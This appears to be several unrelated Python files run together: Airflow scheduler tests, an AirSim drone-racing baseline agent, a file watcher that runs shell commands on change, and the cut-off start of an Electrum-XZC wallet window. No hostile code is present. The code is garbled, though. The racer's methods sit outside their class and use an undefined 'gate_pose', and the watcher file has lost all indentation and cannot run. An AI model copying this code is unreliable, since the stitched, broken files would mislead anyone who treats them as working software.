    session.merge(tis[0])
    session.commit()

    # assertEquals is a deprecated alias of assertEqual
    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
    tis[0].refresh_from_db()
    self.assertEqual(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
    """Ensure orphaned tasks with non-running dagruns are not reset."""
    dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr1.state = State.SUCCESS  # not RUNNING -> its tasks are left alone
    tis = dr1.get_task_instances(session=session)
    # assertEquals is a deprecated alias of assertEqual
    self.assertEqual(1, len(tis))
    tis[0].state = State.SCHEDULED
    session.merge(dr1)
    session.merge(tis[0])
    session.commit()

    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
    """Create dagruns and ensure only ones with correct states are reset."""
    prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
    states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
    states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]

    dag = DAG(dag_id=prefix,
              start_date=DEFAULT_DATE,
              schedule_interval="@daily")
    tasks = []
    # one task per state, so each (task, state) pairing is exercised below
    for i in range(len(states)):
        task_id = "{}_task_{}".format(prefix, i)
        tasks.append(DummyOperator(task_id=task_id, dag=dag))

    scheduler = SchedulerJob()
    session = settings.Session()

    # create dagruns
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr1.state = State.RUNNING
    dr2.state = State.SUCCESS
    session.merge(dr1)
    session.merge(dr2)
    session.commit()

    # create taskinstances and set states
    dr1_tis = []
    dr2_tis = []
    # the enumerate index in the original loop was unused; plain zip suffices
    for task, state in zip(tasks, states):
        ti1 = TI(task, dr1.execution_date)
        ti2 = TI(task, dr2.execution_date)
        ti1.refresh_from_db()
        ti2.refresh_from_db()
        ti1.state = state
        ti2.state = state
        dr1_tis.append(ti1)
        dr2_tis.append(ti2)
        session.merge(ti1)
        session.merge(ti2)
    session.commit()

    # assertEquals/assertEqual: only QUEUED and SCHEDULED TIs of the
    # RUNNING dagrun count as orphans here
    self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))

    for ti in dr1_tis + dr2_tis:
        ti.refresh_from_db()

    # running dagrun should be reset
    for state, ti in zip(states, dr1_tis):
        if state in states_to_reset:
            self.assertIsNone(ti.state)
        else:
            self.assertEqual(state, ti.state)

    # otherwise not
    for state, ti in zip(states, dr2_tis):
        self.assertEqual(state, ti.state)

    for state, ti in zip(states, dr1_tis):
        ti.state = state
    session.commit()

    scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)

    # check same for dag_run version
    for state, ti in zip(states, dr2_tis):
        self.assertEqual(state, ti.state)

    session.close()
|
baseline_racer.py | from argparse import ArgumentParser
import airsimdroneracinglab as airsim
import cv2
import threading
import time
import utils
import numpy as np
import math
# drone_name should match the name in ~/Document/AirSim/settings.json
class BaselineRacer(object):
    """Baseline drone-racing agent: loads a level, reads gate poses, and
    flies through the gates with moveOnSpline-style trajectory calls."""

    def __init__(
        self,
        drone_name="drone_1",
        viz_traj=True,
        viz_traj_color_rgba=[1.0, 0.0, 0.0, 1.0],
        viz_image_cv2=True,
    ):
        # NOTE(review): mutable default for viz_traj_color_rgba is shared
        # across instances; harmless here since it is never mutated, but
        # worth confirming before reuse.
        self.drone_name = drone_name
        self.gate_poses_ground_truth = None  # filled by get_ground_truth_gate_poses()
        self.viz_image_cv2 = viz_image_cv2
        self.viz_traj = viz_traj
        self.viz_traj_color_rgba = viz_traj_color_rgba
        self.airsim_client = airsim.MultirotorClient()
        self.airsim_client.confirmConnection()
        # we need two airsim MultirotorClient objects because the comm lib we use (rpclib) is not thread safe
        # so we poll images in a thread using one airsim MultirotorClient object
        # and use another airsim MultirotorClient for querying state commands
        self.airsim_client_images = airsim.MultirotorClient()
        self.airsim_client_images.confirmConnection()
        self.airsim_client_odom = airsim.MultirotorClient()
        self.airsim_client_odom.confirmConnection()
        self.level_name = None
        # polling threads are created here but only started by the
        # start_*_callback_thread() methods below
        self.image_callback_thread = threading.Thread(
            target=self.repeat_timer_image_callback, args=(self.image_callback, 0.03)
        )
        self.odometry_callback_thread = threading.Thread(
            target=self.repeat_timer_odometry_callback,
            args=(self.odometry_callback, 0.02),
        )
        self.is_image_thread_active = False
        self.is_odometry_thread_active = False
        self.MAX_NUMBER_OF_GETOBJECTPOSE_TRIALS = (
            10  # see https://github.com/microsoft/AirSim-Drone-Racing-Lab/issues/38
        )
# loads desired level
def load_level(self, level_name, sleep_sec=2.0):
    """Load *level_name* in the simulator and block until it has settled."""
    self.level_name = level_name
    self.airsim_client.simLoadLevel(self.level_name)
    self.airsim_client.confirmConnection()  # failsafe
    time.sleep(sleep_sec)  # let the environment load completely

# Starts an instance of a race in your given level, if valid
def start_race(self, tier=3):
    """Start a race at the given competition *tier*."""
    self.airsim_client.simStartRace(tier)

# Resets a current race: moves players to start positions, timer and penalties reset
def reset_race(self):
    self.airsim_client.simResetRace()

# arms drone, enable APIs, set default traj tracker gains
def initialize_drone(self):
    """Enable API control, arm the drone, and push default trajectory
    tracker gains to the flight controller."""
    self.airsim_client.enableApiControl(vehicle_name=self.drone_name)
    self.airsim_client.arm(vehicle_name=self.drone_name)

    # set default values for trajectory tracker gains
    traj_tracker_gains = airsim.TrajectoryTrackerGains(
        kp_cross_track=5.0,
        kd_cross_track=0.0,
        kp_vel_cross_track=3.0,
        kd_vel_cross_track=0.0,
        kp_along_track=0.4,
        kd_along_track=0.0,
        kp_vel_along_track=0.04,
        kd_vel_along_track=0.0,
        kp_z_track=2.0,
        kd_z_track=0.0,
        kp_vel_z=0.4,
        kd_vel_z=0.0,
        kp_yaw=3.0,
        kd_yaw=0.1,
    )
    self.airsim_client.setTrajectoryTrackerGains(
        traj_tracker_gains, vehicle_name=self.drone_name
    )
    time.sleep(0.2)  # give the RPC call time to take effect
def takeoffAsync(self):
    """Blocking takeoff using the stock AirSim takeoff behavior."""
    self.airsim_client.takeoffAsync().join()

# like takeoffAsync(), but with moveOnSpline()
def takeoff_with_moveOnSpline(self, takeoff_height=1.0):
    """Blocking takeoff by flying a spline to *takeoff_height* meters
    above the current position (NED frame: up is negative z)."""
    start_position = self.airsim_client.simGetVehiclePose(
        vehicle_name=self.drone_name
    ).position
    takeoff_waypoint = airsim.Vector3r(
        start_position.x_val,
        start_position.y_val,
        start_position.z_val - takeoff_height,  # NED: subtract to go up
    )

    self.airsim_client.moveOnSplineAsync(
        [takeoff_waypoint],
        vel_max=15.0,
        acc_max=5.0,
        add_position_constraint=True,
        add_velocity_constraint=False,
        add_acceleration_constraint=False,
        viz_traj=self.viz_traj,
        viz_traj_color_rgba=self.viz_traj_color_rgba,
        vehicle_name=self.drone_name,
    ).join()
# stores gate ground truth poses as a list of airsim.Pose() objects in self.gate_poses_ground_truth
def get_ground_truth_gate_poses(self):
    """Query the sim for all gate poses, sorted by track order, and store
    them in self.gate_poses_ground_truth.

    Each pose query is retried up to MAX_NUMBER_OF_GETOBJECTPOSE_TRIALS
    times because simGetObjectPose occasionally returns NaN positions
    (https://github.com/microsoft/AirSim-Drone-Racing-Lab/issues/38).
    """
    # Scene object names are of the form `GateN_GARBAGE`, for example:
    # ['Gate0', 'Gate10_21', 'Gate11_23', 'Gate1_3', 'Gate2_5', ...]
    # Sort by the gate's index of occurrence along the race track (N) and
    # ignore the unreal garbage number after the underscore (GARBAGE).
    # (Replaces the original lexical-sort + argsort two-step with a single
    # keyed sort; gate indices are the sole sort key either way.)
    gate_names_sorted = sorted(
        self.airsim_client.simListSceneObjects("Gate.*"),
        key=lambda gate_name: int(gate_name.split("_")[0][4:]),
    )
    self.gate_poses_ground_truth = []
    for gate_name in gate_names_sorted:
        curr_pose = self.airsim_client.simGetObjectPose(gate_name)
        counter = 0
        while (
            math.isnan(curr_pose.position.x_val)
            or math.isnan(curr_pose.position.y_val)
            or math.isnan(curr_pose.position.z_val)
        ) and (counter < self.MAX_NUMBER_OF_GETOBJECTPOSE_TRIALS):
            print(f"DEBUG: {gate_name} position is nan, retrying...")
            counter += 1
            curr_pose = self.airsim_client.simGetObjectPose(gate_name)
        assert not math.isnan(
            curr_pose.position.x_val
        ), f"ERROR: {gate_name} curr_pose.position.x_val is still {curr_pose.position.x_val} after {counter} trials"
        assert not math.isnan(
            curr_pose.position.y_val
        ), f"ERROR: {gate_name} curr_pose.position.y_val is still {curr_pose.position.y_val} after {counter} trials"
        assert not math.isnan(
            curr_pose.position.z_val
        ), f"ERROR: {gate_name} curr_pose.position.z_val is still {curr_pose.position.z_val} after {counter} trials"
        self.gate_poses_ground_truth.append(curr_pose)
# this is utility function to get a velocity constraint which can be passed to moveOnSplineVelConstraints()
# the "scale" parameter scales the gate facing vector accordingly, thereby dictating the speed of the velocity constraint
def get_gate_facing_vector_from_quaternion(self, airsim_quat, scale=1.0):
    """Return the gate's facing direction (its local +y axis) as an
    airsim.Vector3r scaled by *scale*.

    Falls back to (0, 1, 0) for a (near-)zero quaternion.
    """
    # numpy is already imported at module level as np; the original
    # function-local `import numpy as np` was redundant and is removed.
    # convert gate quaternion to rotation matrix.
    # ref: https://en.wikipedia.org/wiki/Rotation_matrix#Quaternion; https://www.lfd.uci.edu/~gohlke/code/transformations.py.html
    q = np.array(
        [
            airsim_quat.w_val,
            airsim_quat.x_val,
            airsim_quat.y_val,
            airsim_quat.z_val,
        ],
        dtype=np.float64,
    )
    n = np.dot(q, q)
    if n < np.finfo(float).eps:
        # degenerate quaternion: return the world +y axis
        return airsim.Vector3r(0.0, 1.0, 0.0)
    q *= np.sqrt(2.0 / n)
    q = np.outer(q, q)
    rotation_matrix = np.array(
        [
            [1.0 - q[2, 2] - q[3, 3], q[1, 2] - q[3, 0], q[1, 3] + q[2, 0]],
            [q[1, 2] + q[3, 0], 1.0 - q[1, 1] - q[3, 3], q[2, 3] - q[1, 0]],
            [q[1, 3] - q[2, 0], q[2, 3] + q[1, 0], 1.0 - q[1, 1] - q[2, 2]],
        ]
    )
    # second column of the rotation matrix = rotated +y axis = gate normal
    gate_facing_vector = rotation_matrix[:, 1]
    return airsim.Vector3r(
        scale * gate_facing_vector[0],
        scale * gate_facing_vector[1],
        scale * gate_facing_vector[2],
    )
def fly_through_all_gates_one_by_one_with_moveOnSpline(self):
    """Fly towards a single gate with moveOnSpline.

    NOTE(review): `gate_pose` is not defined anywhere in this method, and
    `vel_max`/`acc_max` are only bound when level_name matches one of the
    branches below — calling this for any other level raises
    UnboundLocalError/NameError. A loop over self.gate_poses_ground_truth
    may have been lost; TODO confirm against upstream before relying on it.
    """
    if self.level_name == "Building99_Hard":
        vel_max = 5.0
        acc_max = 2.0
    if self.level_name in [
        "Soccer_Field_Medium",
        "Soccer_Field_Easy",
        "ZhangJiaJie_Medium",
    ]:
        vel_max = 10.0
        acc_max = 5.0
    return self.airsim_client.moveOnSplineAsync(
        [gate_pose.position],
        vel_max=vel_max,
        acc_max=acc_max,
        add_position_constraint=True,
        add_velocity_constraint=False,
        add_acceleration_constraint=False,
        viz_traj=self.viz_traj,
        viz_traj_color_rgba=self.viz_traj_color_rgba,
        vehicle_name=self.drone_name,
    )

def fly_through_all_gates_at_once_with_moveOnSpline(self):
    """Fly one spline through every known gate position.

    NOTE(review): `vel_max`/`acc_max` are unbound for level names not
    listed below — TODO confirm all supported levels are covered.
    """
    if self.level_name in [
        "Soccer_Field_Medium",
        "Soccer_Field_Easy",
        "ZhangJiaJie_Medium",
        "Qualifier_Tier_1",
        "Qualifier_Tier_2",
        "Qualifier_Tier_3",
        "Final_Tier_1",
        "Final_Tier_2",
        "Final_Tier_3",
    ]:
        vel_max = 30.0
        acc_max = 15.0
    if self.level_name == "Building99_Hard":
        vel_max = 4.0
        acc_max = 1.0
    return self.airsim_client.moveOnSplineAsync(
        [gate_pose.position for gate_pose in self.gate_poses_ground_truth],
        vel_max=vel_max,
        acc_max=acc_max,
        add_position_constraint=True,
        add_velocity_constraint=False,
        add_acceleration_constraint=False,
        viz_traj=self.viz_traj,
        viz_traj_color_rgba=self.viz_traj_color_rgba,
        vehicle_name=self.drone_name,
    )

def fly_through_all_gates_one_by_one_with_moveOnSplineVelConstraints(self):
    """Fly towards a single gate with a velocity constraint at the gate.

    NOTE(review): same issues as the moveOnSpline one_by_one variant —
    `gate_pose` is undefined in this method and the speed/accel locals are
    unbound for unlisted levels; TODO confirm intent.
    """
    add_velocity_constraint = True
    add_acceleration_constraint = False
    if self.level_name in ["Soccer_Field_Medium", "Soccer_Field_Easy"]:
        vel_max = 15.0
        acc_max = 3.0
        speed_through_gate = 2.5
    if self.level_name == "ZhangJiaJie_Medium":
        vel_max = 10.0
        acc_max = 3.0
        speed_through_gate = 1.0
    if self.level_name == "Building99_Hard":
        vel_max = 2.0
        acc_max = 0.5
        speed_through_gate = 0.5
        add_velocity_constraint = False
    # scale param scales the gate facing vector by desired speed.
    return self.airsim_client.moveOnSplineVelConstraintsAsync(
        [gate_pose.position],
        [
            self.get_gate_facing_vector_from_quaternion(
                gate_pose.orientation, scale=speed_through_gate
            )
        ],
        vel_max=vel_max,
        acc_max=acc_max,
        add_position_constraint=True,
        add_velocity_constraint=add_velocity_constraint,
        add_acceleration_constraint=add_acceleration_constraint,
        viz_traj=self.viz_traj,
        viz_traj_color_rgba=self.viz_traj_color_rgba,
        vehicle_name=self.drone_name,
    )

def fly_through_all_gates_at_once_with_moveOnSplineVelConstraints(self):
    """Fly one spline through every gate, constraining the velocity at
    each gate to its facing direction scaled by speed_through_gate.

    NOTE(review): locals unbound for level names not listed below.
    """
    if self.level_name in [
        "Soccer_Field_Easy",
        "Soccer_Field_Medium",
        "ZhangJiaJie_Medium",
    ]:
        vel_max = 15.0
        acc_max = 7.5
        speed_through_gate = 2.5
    if self.level_name == "Building99_Hard":
        vel_max = 5.0
        acc_max = 2.0
        speed_through_gate = 1.0
    return self.airsim_client.moveOnSplineVelConstraintsAsync(
        [gate_pose.position for gate_pose in self.gate_poses_ground_truth],
        [
            self.get_gate_facing_vector_from_quaternion(
                gate_pose.orientation, scale=speed_through_gate
            )
            for gate_pose in self.gate_poses_ground_truth
        ],
        vel_max=vel_max,
        acc_max=acc_max,
        add_position_constraint=True,
        add_velocity_constraint=True,
        add_acceleration_constraint=False,
        viz_traj=self.viz_traj,
        viz_traj_color_rgba=self.viz_traj_color_rgba,
        vehicle_name=self.drone_name,
    )
def image_callback(self):
    """Poll one uncompressed FPV camera frame and optionally display it
    with OpenCV. Runs on the dedicated image client/thread."""
    # get uncompressed fpv cam image
    request = [airsim.ImageRequest("fpv_cam", airsim.ImageType.Scene, False, False)]
    response = self.airsim_client_images.simGetImages(request)
    # BUG FIX: np.fromstring is deprecated (and rejects binary data in
    # newer numpy); np.frombuffer is the supported equivalent.
    img_rgb_1d = np.frombuffer(response[0].image_data_uint8, dtype=np.uint8)
    img_rgb = img_rgb_1d.reshape(response[0].height, response[0].width, 3)
    if self.viz_image_cv2:
        cv2.imshow("img_rgb", img_rgb)
        cv2.waitKey(1)
def odometry_callback(self):
    # get uncompressed fpv cam image
    drone_state = self.airsim_client_odom.getMultirotorState()
    # in world frame:
    # NOTE(review): these locals are computed but unused — this looks like
    # a placeholder for subclasses to override; confirm before removing.
    position = drone_state.kinematics_estimated.position
    orientation = drone_state.kinematics_estimated.orientation
    linear_velocity = drone_state.kinematics_estimated.linear_velocity
    angular_velocity = drone_state.kinematics_estimated.angular_velocity

# call task() method every "period" seconds.
def repeat_timer_image_callback(self, task, period):
    # loops until stop_image_callback_thread() clears the flag
    while self.is_image_thread_active:
        task()
        time.sleep(period)

def repeat_timer_odometry_callback(self, task, period):
    # loops until stop_odometry_callback_thread() clears the flag
    while self.is_odometry_thread_active:
        task()
        time.sleep(period)
def start_image_callback_thread(self):
    """Start the image polling thread; no-op if already running."""
    if not self.is_image_thread_active:
        self.is_image_thread_active = True
        self.image_callback_thread.start()
        print("Started image callback thread")

def stop_image_callback_thread(self):
    """Signal the image thread to stop and wait for it; no-op if inactive."""
    if self.is_image_thread_active:
        self.is_image_thread_active = False
        self.image_callback_thread.join()
        print("Stopped image callback thread.")

def start_odometry_callback_thread(self):
    """Start the odometry polling thread; no-op if already running."""
    if not self.is_odometry_thread_active:
        self.is_odometry_thread_active = True
        self.odometry_callback_thread.start()
        print("Started odometry callback thread")

def stop_odometry_callback_thread(self):
    """Signal the odometry thread to stop and wait for it; no-op if inactive."""
    if self.is_odometry_thread_active:
        self.is_odometry_thread_active = False
        self.odometry_callback_thread.join()
        print("Stopped odometry callback thread.")
def main(args):
    """Run the baseline racer end to end for the CLI arguments in *args*."""
    # ensure you have generated the neurips planning settings file by running python generate_settings_file.py
    racer = BaselineRacer(
        drone_name="drone_1",
        viz_traj=args.viz_traj,
        viz_traj_color_rgba=[1.0, 1.0, 0.0, 1.0],
        viz_image_cv2=args.viz_image_cv2,
    )
    racer.load_level(args.level_name)

    # qualifier levels force a fixed race tier regardless of --race_tier
    forced_tiers = {
        "Qualifier_Tier_1": 1,
        "Qualifier_Tier_2": 2,
        "Qualifier_Tier_3": 3,
    }
    if args.level_name in forced_tiers:
        args.race_tier = forced_tiers[args.level_name]

    racer.start_race(args.race_tier)
    racer.initialize_drone()
    racer.takeoff_with_moveOnSpline()
    racer.get_ground_truth_gate_poses()
    racer.start_image_callback_thread()
    racer.start_odometry_callback_thread()

    if args.planning_baseline_type == "all_gates_at_once":
        if args.planning_and_control_api == "moveOnSpline":
            racer.fly_through_all_gates_at_once_with_moveOnSpline().join()
        if args.planning_and_control_api == "moveOnSplineVelConstraints":
            racer.fly_through_all_gates_at_once_with_moveOnSplineVelConstraints().join()
    if args.planning_baseline_type == "all_gates_one_by_one":
        if args.planning_and_control_api == "moveOnSpline":
            racer.fly_through_all_gates_one_by_one_with_moveOnSpline().join()
        if args.planning_and_control_api == "moveOnSplineVelConstraints":
            racer.fly_through_all_gates_one_by_one_with_moveOnSplineVelConstraints().join()

    # Comment out the following if you observe the python script exiting prematurely, and resetting the race
    racer.stop_image_callback_thread()
    racer.stop_odometry_callback_thread()
    racer.reset_race()
if __name__ == "__main__":
    # CLI: pick a level, a planning baseline, and a control API, then race.
    parser = ArgumentParser()
    parser.add_argument(
        "--level_name",
        type=str,
        choices=[
            "Soccer_Field_Easy",
            "Soccer_Field_Medium",
            "ZhangJiaJie_Medium",
            "Building99_Hard",
            "Qualifier_Tier_1",
            "Qualifier_Tier_2",
            "Qualifier_Tier_3",
            "Final_Tier_1",
            "Final_Tier_2",
            "Final_Tier_3",
        ],
        default="ZhangJiaJie_Medium",
    )
    parser.add_argument(
        "--planning_baseline_type",
        type=str,
        choices=["all_gates_at_once", "all_gates_one_by_one"],
        default="all_gates_at_once",
    )
    parser.add_argument(
        "--planning_and_control_api",
        type=str,
        choices=["moveOnSpline", "moveOnSplineVelConstraints"],
        default="moveOnSpline",
    )
    # visualization toggles (both off by default)
    parser.add_argument(
        "--enable_viz_traj", dest="viz_traj", action="store_true", default=False
    )
    parser.add_argument(
        "--enable_viz_image_cv2",
        dest="viz_image_cv2",
        action="store_true",
        default=False,
    )
    # note: qualifier levels override this value in main()
    parser.add_argument("--race_tier", type=int, choices=[1, 2, 3], default=1)
    args = parser.parse_args()
    main(args)
|
watcher.py | from __future__ import print_function
import datetime
import os
import threading
import time
class Watcher(object):
def __init__(self, files=None, cmds=None, verbose=False, clear=False):
self.files = []
self.cmds = []
self.num_runs = 0
self.mtimes = {}
self._monitor_continously = False
self._monitor_thread = None
self.verbose = verbose
self.clear = clear
if files: self.add_files(*files)
if cmds: self.add_cmds(*cmds)
def monitor(self):
#We only want one thread, dear god
self.stop_monitor()
self._monitor_continously = True
self._monitor_thread = threading.Thread(target=self._monitor_till_stopped)
self._monitor_thread.start()
def run_monitor(self):
"""Called by main thread methods like __main__ so Ctrl-C works"""
self.monitor()
try:
while self._monitor_continously:
time.sleep(.02)
except KeyboardInterrupt:
self.stop_monitor()
def stop_monitor(self):
if self._monitor_thread and self._monitor_thread.isAlive():
self._monitor_continously = False
self._monitor_thread.join(0.05)
def _monitor_till_stopped(self):
while self._monitor_continously:
self.monitor_once()
time.sleep(1)
def monitor_once(self, execute=True):
for f in self.files:
try:
mtime = os.stat(f).st_mtime
except OSError:
#The file might be right in the middle of being written so sleep
time.sleep(1)
mtime = os.stat(f).st_mtime
if f not in self.mtimes.keys():
self.mtimes[f] = mtime
continue
if mtime > self.mtimes[f]:
if self.verbose: print("File changed: %s" % os.path.realpath(f))
self.mtimes[f] = mtime
if execute:
self.execute()
break
def execute(self):
if self.verbose: print("Running commands at %s" % (datetime.datetime.now(), ))
if self.clear:
os.system('clear')
[ os.system(cmd) for cmd in self.cmds ]
self.num_runs += 1
return self.num_runs
def walk_dirs(self, dirnames):
dir_files = []
for dirname in dirnames:
for path, dirs, files in os.walk(dirname):
files = [ os.path.join(path, f) for f in files ]
dir_files.extend(files)
dir_files.extend(self.walk_dirs(dirs))
return dir_files
def add_files(self, *files):
dirs = [ os.path.realpath(f) for f in files if os.path.isdir(f) ]
files = [ os.path.realpath(f) for f in files if os.path.isfile(f) ]
dir_files = self.walk_dirs(dirs)
files.extend(dir_files)
valid_files = [ os.path.realpath(f) for f in files if os.path.exists(f) and os.path.isfile(f) ]
unique_files = [ f for f in valid_files if f not in self.files ]
self.files = self.files + unique_files
self.monitor_once(execute=False)
def add_cmds(self, *cmds):
unique_cmds = [ c for c in cmds if c not in self.cmds ]
self.cmds = self.cmds + unique_cmds
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum_xzc
from electrum_xzc import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_xzc.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_xzc.plugin import run_hook
from electrum_xzc.i18n import _
from electrum_xzc.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum_xzc.transaction import Transaction, TxOutput
from electrum_xzc.address_synchronizer import AddTransactionException
from electrum_xzc.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_xzc.version import ELECTRUM_VERSION
from electrum_xzc.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_xzc.exchange_rate import FxThread
from electrum_xzc.simple_config import SimpleConfig
from electrum_xzc.logging import Logger
from electrum_xzc.paymentrequest import PR_PAID
from electrum_xzc.masternode_manager import MasternodeManager
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .masternode_dialog import MasternodeDialog
from .dash_qt import ExtraPayloadWidget
from .protx_qt import create_dip3_tab
class StatusBarButton(QPushButton):
    """Flat 25px icon button for the status bar that runs *func* when
    clicked or when Return is pressed while focused."""

    def __init__(self, icon, tooltip, func):
        QPushButton.__init__(self, icon, '')
        self.setToolTip(tooltip)
        self.setFlat(True)
        self.setMaximumWidth(25)
        self.clicked.connect(self.onPress)
        self.func = func
        self.setIconSize(QSize(25, 25))
        self.setCursor(QCursor(Qt.PointingHandCursor))

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()

    def keyPressEvent(self, e):
        if e.key() == Qt.Key_Return:
            self.func()
        else:
            # BUG FIX: forward unhandled keys to the base class instead of
            # silently swallowing every key press while the button has focus
            super().keyPressEvent(e)
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
    """Main wallet window: tabs, menus, status bar, and the glue between
    the network/daemon threads and the Qt GUI thread."""

    # Qt signals used to marshal work from network/worker threads onto the
    # GUI thread (cross-thread emissions are queued by Qt).
    payment_request_ok_signal = pyqtSignal()
    payment_request_error_signal = pyqtSignal()
    new_fx_quotes_signal = pyqtSignal()
    new_fx_history_signal = pyqtSignal()
    network_signal = pyqtSignal(str, object)
    alias_received_signal = pyqtSignal()
    computing_privkeys_signal = pyqtSignal()
    show_privkeys_signal = pyqtSignal()

    def __init__(self, gui_object, wallet: Abstract_Wallet):
        """Build the window for an already-opened *wallet*.

        gui_object is the application-level GUI controller providing the
        shared config, daemon (network, fx), tray icon and Qt app.
        """
        QMainWindow.__init__(self)
        self.setObjectName("main_window_container")
        self.masternode_manager = None
        self.gui_object = gui_object
        self.config = config = gui_object.config  # type: SimpleConfig
        self.gui_thread = gui_object.gui_thread
        self.setup_exception_hook()
        self.network = gui_object.daemon.network  # type: Network
        assert wallet, "no wallet"
        self.wallet = wallet
        self.fx = gui_object.daemon.fx  # type: FxThread
        self.invoices = wallet.invoices
        self.contacts = wallet.contacts
        self.tray = gui_object.tray
        self.app = gui_object.app
        self.cleaned_up = False
        self.payment_request = None  # type: Optional[paymentrequest.PaymentRequest]
        self.checking_accounts = False
        self.qr_window = None
        self.not_enough_funds = False
        self.pluginsdialog = None
        self.require_fee_update = False
        self.tl_windows = []  # stack of top-level modal windows (see push_top_level_window)
        self.tx_external_keypairs = {}
        Logger.__init__(self)

        # queue of incoming txs to show in the tray notification
        self.tx_notification_queue = queue.Queue()
        self.tx_notification_last_time = 0

        self.create_status_bar()
        self.need_update = threading.Event()

        # display unit: fall back to the default if the configured value
        # is not a known base unit
        self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
        try:
            decimal_point_to_base_unit_name(self.decimal_point)
        except UnknownBaseUnit:
            self.decimal_point = DECIMAL_POINT_DEFAULT
        self.num_zeros = int(config.get('num_zeros', 0))

        self.completions = QStringListModel()

        # build tabs; optional ones are only added when enabled in config
        self.tabs = tabs = QTabWidget(self)
        self.send_tab = self.create_send_tab()
        self.receive_tab = self.create_receive_tab()
        self.addresses_tab = self.create_addresses_tab()
        self.utxo_tab = self.create_utxo_tab()
        self.dip3_tab = create_dip3_tab(self, wallet)
        self.console_tab = self.create_console_tab()
        self.contacts_tab = self.create_contacts_tab()
        tabs.setObjectName("main_window_nav_bar")
        tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
        tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
        tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))

        def add_optional_tab(tabs, tab, icon, description, name):
            # remember metadata so toggle_tab() can re-insert at tab_pos
            tab.tab_icon = icon
            tab.tab_description = description
            tab.tab_pos = len(tabs)
            tab.tab_name = name
            if self.config.get('show_{}_tab'.format(name), False):
                tabs.addTab(tab, icon, description.replace("&", ""))

        add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
